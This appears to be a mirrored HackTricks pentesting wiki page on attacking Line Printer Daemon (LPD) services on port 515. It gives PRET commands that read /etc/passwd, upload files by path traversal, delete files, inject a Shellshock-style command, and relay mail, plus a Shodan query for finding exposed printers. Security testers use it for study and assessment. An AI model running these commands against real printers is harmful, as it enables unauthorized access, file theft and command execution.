maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
carlospolop 827e6354da fix some titles
2025-07-08 13:28:53 +02:00

38 lines
2.0 KiB
Markdown
Raw Blame History

# 515 Pentesting Line Printer Daemon (LPD)
{{#include ../banners/hacktricks-training.md}}
## **Introduction to LPD Protocol**
In the 1980s, the **Line Printer Daemon (LPD) protocol** was developed in Berkeley Unix, which later became formalized through RFC1179. This protocol operates over port 515/tcp, allowing interactions through the `lpr` command. The essence of printing via LPD involves sending a **control file** (to specify job details and user) along with a **data file** (which holds the print information). While the control file allows the selection of **various file formats** for the data file, the handling of these files is determined by the specific LPD implementation. A widely recognized implementation for Unix-like systems is **LPRng**. Notably, the LPD protocol can be exploited to execute **malicious PostScript** or **PJL print jobs**.
## **Tools for Interacting with LPD Printers**
[**PRET**](https://github.com/RUB-NDS/PRET) introduces two essential tools, `lpdprint` and `lpdtest`, offering a straightforward method to interact with LPD-compatible printers. These tools enable a range of actions from printing data to manipulating files on the printer, such as downloading, uploading, or deleting:
```python
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
```
For individuals interested in further exploring the realm of **printer hacking**, a comprehensive resource can be found here: [**Hacking Printers**](http://hacking-printers.net/wiki/index.php/Main_Page).
## Shodan
- `port 515`
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink